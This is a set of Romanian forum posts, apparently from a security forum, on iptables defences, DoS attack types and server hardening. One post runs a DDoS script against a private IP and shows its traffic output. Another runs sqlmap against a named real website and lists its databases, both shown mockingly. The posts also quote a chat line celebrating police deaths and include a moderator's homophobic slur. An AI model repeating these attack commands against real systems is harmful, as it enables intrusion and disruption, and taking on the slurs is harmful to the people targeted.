aelius

Sunt mai multe chestii de care trebuie sa tii cont. Iptables face tracking la pachete si la un moment dat, in functie de valorile care le au net.nf_conntrack_max, net.ipv4.netfilter.ip_conntrack_max - netfilterul incepe sa blocheze pachete pana ce coada (queue) va fi mai mica. Ideal ar fi specificat explicit NOTRACK, insa in acest caz, connlimit si hashlimit nu mai functioneaza. (oricum nu e cazul la tine pt. ca ai openvz) Cred ca cel mai bine in cazul tau, este sa faci un wrapper (un mic script bash) si sa-l pui in crontab la 1 minut. El va parsa error_log de la nginx, va sorta ip-urile si le va adauga intr-o lista cu drop. Arunca o privire si aici: - Fail2Ban - csf // edit: Atunci e simplu: iptables -A INPUT -p tcp --syn --dport 80 -m connlimit --connlimit-above 10 -j REJECT --reject-with tcp-reset iptables -A INPUT -p tcp --syn --dport 80 -m connlimit --connlimit-above 50 --connlimit-mask 24 -j REJECT --reject-with tcp-reset iptables -A INPUT -p tcp --dport 80 -m hashlimit --hashlimit-upto 50/min --hashlimit-burst 500 --hashlimit-mode srcip --hashlimit-name http -j ACCEPT iptables -A INPUT -p tcp --dport 80 -j DROP Ar trebui sa nu mai vezi log-urile in nginx, sau sa apara f. rar; Requesturile or sa fie blocate de iptables. // edit2: Nu e bun scriptul ala. Poti da flush periodic la log-ul de nginx. ex: echo "" > errror.log Apropo, de ce cauti scripturi pe net si nu inveti mai bine cum functioneaza iptables si sa-ti faci singur un firewall personalizat ? (exact pentru ce ai nevoie). Este foarte simplu iptables si are logica

Am ras de am crapat, nu mai rasesem asa din 1976. E cea mai tare caterinca dintre caterinci de care este Va rog sa ma credeti, macar voi, daca eu nu.

Ba da, e luat. Daca un domeniu nu se incarca in browser, nu inseamna ca nu este inregistrat. E luat inca din 2003. Era culmea sa nu fie

Cumpar Topor!

Hahahhaha. Vere, tu esti asta ?

Aha, si ala cand pune plicul cu citatia scrie: DESTINATAR: Dl. fimoza85 Adresa: 218.211.76.19, Port 80, Aleea TCP SYN Serios acum, eu nu stiu de ce rahat va indindeti la discutii de genul. Vede cineva rostul acestul thread sau doar eu am pareri ?

Si sursa te rugam. Multumim // edit: nu citesc, ma uitam dupa link in speranta ca va fi formatat codul cum trebuie altfel, apar balauri + >*< File "xxx.py", line 42 result=[] ^ IndentationError: expected an indented block File "xxx.py", line 118 global sploitshake, pwnsauce ^ IndentationError: expected an indented block File "xxx.py", line 128 s.send(unhexlify(pkt)) ^ IndentationError: expected an indented block File "xxx.py", line 169 if len(chunk) != chunk_size: ^ IndentationError: expected an indented block File "xxx.py", line 168 for chunk in buf_chunks: if len(chunk) != chunk_size: ^ SyntaxError: invalid syntax raw source here => http://pastebin.com/raw.php?i=AwpsBWVQ

Ba da, aia cu spam-ul

@Hennessey: Succes cu SRL-ul si cu pseudo-diplomele lor. Tu chiar crezi ce scrie pe site-ul lor ? Pana si domeniul lor e pus cu privacy. De ce saracia ai pune privacy la domeniul sub care iti faci business-ul ? Domain Name: LINK-ACADEMY.COM Registrar: GODADDY.COM, LLC Whois Server: whois.godaddy.com Referral URL: http://registrar.godaddy.com Name Server: NS1.IT-AKADEMIJA.COM Name Server: NS2.IT-AKADEMIJA.COM Status: clientDeleteProhibited Status: clientRenewProhibited Status: clientTransferProhibited Status: clientUpdateProhibited Updated Date: 12-mar-2012 Creation Date: 12-mar-2012 Expiration Date: 12-mar-2013 Administrative Contact: Private, Registration LINK-ACADEMY.COM@domainsbyproxy.com Domains By Proxy, LLC DomainsByProxy.com 14747 N Northsight Blvd Suite 111, PMB 309 Scottsdale, Arizona 85260 United States (480) 624-2599 Fax -- (480) 624-2598 "În România exist?m din anul 2010. Din aceast? regiune am avut, pân? acum, un num?r considerabil de cursan?i." ; Si cum isi faceau publicitate ? Cu porumbeii voiajori poate, ca domeniul este inregistrat pe 12 martie 2012. De asemenea, daca isi desfasoara activitatea in Romania, de cine sunt acreditati ? Astia si cu spiru haret ; te scuipa lumea daca le arati papirusul

Chat-ul rst: http://www.share-images.org/images/8yk1ix4zrj1fv5ogi86.png Discutie pe chat: (15:42:42) passfig: ca cacat (15:42:50) passfig: ce* (15:42:53) Ciresel21: iti dau tie NDDOS? (15:42:54) Ciresel21: (15:42:57) alecseu: E nasoleala treaba.. (15:43:08) oul: e un bug ceva... (15:43:18) alecseu: Da... (15:43:25) alecseu: E de la hosting (15:43:29) alecseu: Nu mai face fata (15:43:31) alecseu: )))))))))))))))))))) (15:43:59) fallen_angel: b? (15:44:01) fallen_angel: se lucreaz? (15:44:03) fallen_angel: da ce ?tii tu (15:44:04) fallen_angel: (15:44:39) alecseu: Da.. (15:44:40) fallen_angel: .. (15:44:44) alecseu: E problema la sv. de mysql cred. (15:44:51) fallen_angel: de cs (15:44:53) fallen_angel: (15:45:03) RST: DarkyAngel logs into the Chat. (15:45:05) fallen_angel: e de la radio (15:45:08) fallen_angel: )))))))))) (15:45:22) alecseu: Darky m@n3 (15:45:23) DarkyAngel: salut salut (15:45:29) Ciresel21: salut (15:45:39) Ciresel21: ba alecseu da ce le stii tu pe toate=)) (15:45:58) fallen_angel: b? alecseu Eu stergeam sesiunile la fiecare doua secunde

Mai bine invatati singuri si pentru certificare, vedeti ceva pe afara, cand aveti resurse. Diplomele din Romania nu sunt luate in considerare afara. Printre singurele recunoscute sunt cele de la politehnica si automatica, in rest, va vor folosi ca hartie igienica. O diploma de la un SRL ca asta, nu va ofera nimic. Asa haideti ca-mi fac si eu RTFM Academy, am undeva la +14 ani de linux in spate si va dau diplome (bune de sters la fund). Cine credeti ca le va recunoaste ?

(09:44:45) ralex: am mai scapat azi de 3 militieni (09:44:45) ralex: http://stirileprotv.ro/stiri/act?ualitate/trei-politisti-au-murit-?si-al-patrulea-este-ranit-grav-du?pa-ce-s-au-rasturnat-cu-masina-in?-giurgiu.html (09:44:58) ralex: cu ajutorul lu dumnezeu se fac 4

Salut, 22 (ssh) il poti accepta doar de la surse bine stabilite (ex: home, work) si apoi faci DROP pe restul. 25 este smtp, daca nu ai server de email pe server, il poti bloca la INPUT; Email-urile de confirmare de la site-uri se trimit si asa. 585 este smtp submission, nu ai nevoie de el 3306 este mysql, nu ai nevoie de el decat pe localhost, poti seta in my.cnf sa faca bind doar pe 127.0.0.1 9000 (php-fpm sau fastcgi) trebuie listat doar pe localhost, nu pe ip-ul public. Deci iti ramane doar 80 open. In legatura cu iptables-ul, nu stiu daca iti permite vps-ul asta (banuiesc ca e openvz). Ar trebui sa recompilezi iptables (iti trebuie si sursele kernelului)

Nu nu 29602 este size (Length) si este prezent in pachetul tcp sub alta forma (daca faci debug cu tcpdump se vede) # du -csh testing.300mb.txt 301M testing.300mb.txt 301M total -------------------------------- Log-ul de la wget: [25/Sep/2012:21:00:51 +0200] "GET /testing.300mb.txt HTTP/1.0" 200 314573125 "-" "Wget/1.13.4 (freebsd8.2)" Se vede acolo 314573125 ? saturn ~ # echo 314573125/1024/1024|bc 300 => dimensiunea fisierului PS: "-t filter" se specifica degeaba in iptables. INPUT, OUTPUT si FORWARD sunt default in filter (sunt chain-uri de filtrare, nu de marcare) @ilbr22: nu iti merg reguli cu string pentru ca nu ai suport iptables pe acel vps. Ia verifica daca ai asa ceva: saturn ~ # find /lib/modules/`uname -r` -name xt_string.ko /lib/modules/2.6.32.15-1-grsec/kernel/net/netfilter/xt_string.ko

Pune-l sa ia un hosting mai ok. Sa intrebe in prealabil ce memory_limit are in php. Trebuie minim 128M sa mearga decent. (Majoritatea hosterilor au 32/64 M). Daca isi ia VPS sau un server, recomand nginx + php-fpm in loc de apache ; Aici trebuie sa iei in vedere faptul ca ar avea nevoie de un om sa faca update-uri & stuff pe server.

Cel mai modern data center Un PC pentru impatimitii de facebook

Mai jos, o sa va prezint majoritatea tipurilor de atac dos/ddos cat si ce anume vizeaza ele. Am omis din lista atacurile ce tineau de anii 95 (igmp, nuke, windows 95 based. Subiectul este ocolit de multi pentru ca sunt foarte putine companiile care ofera solutii reale de filtrare a atacurilor (de regula este bullshit de marketing), iar cele care ofera astfel de solutii, este logic ca le tin private, pentru ca preturile sunt extrem de mari iar tehnologiile de filtering sunt putine si de multe ori ineficiente in fata atacurilor “moderne”. Cam atat despre asta pentru moment, si sa trecem la subiectul acestui tutorial. [*] UDP Flood Congestia conexiunii. Este un atack ce 'consuma' latimea de banda. [*] ICMP Flood Congestia conexiunii. Este un atack ce 'consuma' latimea de banda. [*] TCP Flood (SYN) Congestia conexiunii. De asemenea, consuma ciclii de procesare (Epuizarea resurselor CPU). Poate face inoperabil OS si poate folosi toti socketii disponibili. Incarca tabelele de conexiuni si face sistemul sa nu accepte conexiuni noi, pentru ca lista de asteptare (queue) devine plina. Daca este cu sursa spofata si numarul de pachete este considerabil, este aproape imposibil de filtrat. Poate fi ameliorat efectul doar cu echipamente specializate sau distribuirea serviciilor in clustere. FreeBSD are un sistem relativ bun de protectie pentru acest lucru (synproxy), insa la foarte multe sesiuni tcp noi pe secunda, acesta nu face fata cu un singur sistem folosit pentru filtrare. De asemenea, pe FreeBSD exista mai multe mecanisme pentru acest lucru. Unul dintre acestea este syncache. O alta metoda de a ameliora efectele sale, sunt reducerea timpilor de acceptare a conexiunilor. Este cel mai 'profi' atac (D)DoS. [*] Smurf attack Congestia conexiunii. Atacurile smurf se mai numesc si 'ICMP amplification attack' sau 'Reflection Attack'. Acest tip de atack vizeaza adresa broadcast. [*] Fraggle attack Congestia conexiunii. Fraggle este un tip de flood asemanator cu Smurf, insa pachetele trimise sunt UDP. Acest tip de atack vizeaza adresa broadcast, DST PORT 7 (echo) [*] Papasmurf attack Congestia conexiunii. Acest tip de flood este un hibrid rezultat din combinarea atacurilor Fraggle+Smurf. [*] Land attack Daca serverul vizat este linux, in majoritatea cazurilor kernelul da crash. Sursa atacului este alterata, astfel incat devinde identica cu destinatia, fapt pentru care, kernelul incepe sa-i(si) raspunda cu 'ack'. (war ack) Nota: Nu am idee daca mai functioneaza la kernel 2.6.x ; La FreeBSD nu functioneaza pentru ca are un sistem de protectie ce face sa nu accepte pachete din afara cu adresa ip configurata pe interfata. [*] Eyenetdee Acest tip de atack este foarte asemanator cu 'Land attack', diferenta este ca sunt folosite pachete SYN. Tinta acestui atac sunt aplicatiile, in special pop3, imap si ftp. (probabilitatea de a bloca aplicatiile) [*] DNS Amplification Attack Congestia conexiunii. De asemenea, consuma ciclii de procesare (Epuizarea resurselor CPU) Aceste atacuri se bazeaza pe baza 'amplificarii' in intensitate, din cauza folosirii interogarilor recursive. Din moment ce vizeaza doar serviciul DNS (bind/named), in cazul in care este bine configurat si nu accepta interogari recursive, acest atac nu are randament. [*] TCP Fin Flood (spoofed) Acest tip de flood consuma ciclii de procesare (Epuizarea resurselor CPU), in cazuri rare genereaza si congestiunea conexiunii. Sursa pachetelor este alterata (spoofata) iar pachetele tcp au flag-ul FIN setat. Este usor de filtrat, in special pe FreeBSD. [*] TCP RST flood (spoofed) Acest tip de flood consuma ciclii de procesare (Epuizarea resurselor CPU) si genereaza congestiunea conexiunii. Sursa pachetelor este alterata (spoofata) iar pachetele tcp au flag-ul RST setat. Este relativ usor de filtrat. [*] TCP ACK (spoofed) Acest tip de flood consuma ciclii de procesare (Epuizarea resurselor CPU) si genereaza congestiunea conexiunii. Sursa pachetelor este alterata (spoofata) iar pachetele tcp au flag-ul ACK setat. [*] SIP Flood Acest tip de atac are ca tinta echipamentele VoIP si vizeaza blocarea lor. Se bazeaza pe trimiterea de mesje 'INVITE' catre porturile 5060, 5061 (in general) Nota: o sa fie alt subiect despre atacurile dos/ddos low-bandwidth based.

Sa nu va mai certati de pomana: hp ~ $ mkdir rst hp ~ $ cd rst/ hp rst $ curl -o ala.rar http://netcologne.dl.sourceforge.net/project/dequiem/Dequiem2.0/Dequiem2.0%28Test%29.rar % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 4421 100 4421 0 0 32760 0 --:--:-- --:--:-- --:--:-- 80381 hp rst $ unrar x ala.rar UNRAR 3.93 freeware Copyright (c) 1993-2010 Alexander Roshal Extracting from ala.rar Creating Dequiem2.0 OK Creating Dequiem2.0/Deq OK Extracting Dequiem2.0/Deq/ddos.py OK Extracting Dequiem2.0/Deq/findip.py OK Extracting Dequiem2.0/Deq/help.py OK Extracting Dequiem2.0/Deq/main.py OK Extracting Dequiem2.0/Deq/portscan.py OK Extracting Dequiem2.0/Deq/SQLi.py OK Extracting Dequiem2.0/Dequiem2.0.py OK All OK hp rst $ cd Dequiem2.0/Deq hp Deq $ python ddos.py DDoS mode loaded Site you want to DDoS:172.16.0.2 Port you want to attack:80 Input the message you want to send:testeeeeeeeeeeeee How many connections you want to make:1000 [172.16.0.2] [Ip is locked] [Attacking 172.16.0.2] +----------------------------+ |[DDoS Attack Engaged] | |[DDoS Attack Engaged] | |[DDoS Attack Engaged] | |[DDoS Attack Engaged] | |[DDoS Attack Engaged] | |[DDoS Attack Engaged] | |[DDoS Attack Engaged] | ............ ............ The connections you requested had finished Do you want to ddos more? Statistica real time la dst port 80: => Currently 67.13 kBps/655.00 pps, Average: 1.42 kBps/10.87 pps => Currently 61.78 kBps/1.05 kpps, Average: 2.07 kBps/22.04 pps => Currently 63.02 kBps/1.07 kpps, Average: 2.72 kBps/33.19 pps => Currently 58.96 kBps/1.00 kpps, Average: 3.31 kBps/43.37 pps => Currently 62.07 kBps/1.06 kpps, Average: 3.92 kBps/53.91 pps => Currently 60.45 kBps/1.03 kpps, Average: 4.50 kBps/64.02 pps => Currently 60.33 kBps/1.03 kpps, Average: 5.07 kBps/73.88 pps => Currently 62.82 kBps/1.07 kpps, Average: 5.65 kBps/83.94 pps => Currently 60.70 kBps/1.03 kpps, Average: 6.20 kBps/93.40 pps => Currently 59.61 kBps/1.01 kpps, Average: 6.73 kBps/102.48 pps => Currently 61.78 kBps/1.06 kpps, Average: 7.27 kBps/111.87 pps => Currently 18.80 kBps/325.00 pps, Average: 7.38 kBps/113.94 pps Concluzia: Scriptul este gandit prost. Daca vreti ceva "low bandwidth", folositi slowloris. * Nota: tool-ul folosit pentru analiza traficului este "rate" ("/usr/ports/net-mgmt/rate" la FreeBSD)

Si tu ce sari asa ca scroafa homosexuala fara sa citesti regulile ? Ban 7 zile. Ai timp sa dai cu pingu-n localhost de nebun. Thread closed, ca si asa era deschis de alt labar cu impresii de hacker.

spune bre ca esti student si cauti coleg pentru a pune impreuna la chirie, ca imediat apar baietii glumeti si o sa spuna ca esti poponar! ps: modific eu titlul ala din "Caut" in altceva. // edit: ah, cauti colega, nu coleg )

rooturi, sigur ca da Cumpar topor!

Ce sintaxa vrei frate, nu te uiti ce scrie la el la location ? Toata treaba aia a durat doua secunde. Ce ca**t de hacking e asta ? A luat un link si a dat cu sqlmap pe el hp ~ # sqlmap -u "http://www.mida.ro/content.php?id=21" --dbs --union-use sqlmap/0.8 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 23:48:13 ............... web server operating system: Linux Fedora web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL 5 [23:48:14] [INFO] fetching database names available databases [23]: [*] ambalaj_ccihr [*] costides_cartuse [*] costides_corvina [*] costides_dekoratex [*] costides_sazy [*] costides_transilva [*] csalad [*] csikisport [*] hardwarecenter_hc [*] hardwarecenter_szamla [*] information_schema [*] markbi [*] mida [*] munkacsy [*] mysql [*] parfum [*] parfumworld [*] salvator [*] syrinx [*] test [*] twinart [*] vkv [*] zarafa gata frate, am dat o comanda si sunt hacker, o sa fiu in imparatia cerului, ia sa-l pun inca odata pe show off pe RST, poate o sa capat respectul baietilor, ca sunt bazat

Citeste regulile forumului te rugam. Aceasta sectiune este pentru altceva iar ultimul raspuns in acest thread a fost acum 1 an. Esti liberi sa deschizi un thread in sectiunea "Ajutor" in care sa spui problema cu lux de amanunte. Exemplu: Am un stick wireless marca ____, folosesc OS _____, incerc sa fac _____ insa primesc eroarea ____ ...... Daca nu stii sa pui intrebari, nu te astepta sa primesti raspunsuri. Thread closed

E o vorba buna: "Do not try to invent your own internet". Un 404 poate aparea oricand in site in urma unui link incorect sau chiar a faviconului lipsa. //edit: @ibr22: Problema cu 404 nu ar intra in aceasta sectiune, ci intr-o discutie legata de servere web sau special pentru nginx. Este abordata gresit chestia cu proxy_pass ; Nu dorim ca requesturile sa se faca in continuare prin serverul nostru. As opta pentru rewrite. error_page 404 /404.html; location = /404.html { rewrite . http://www.google.com/ last; }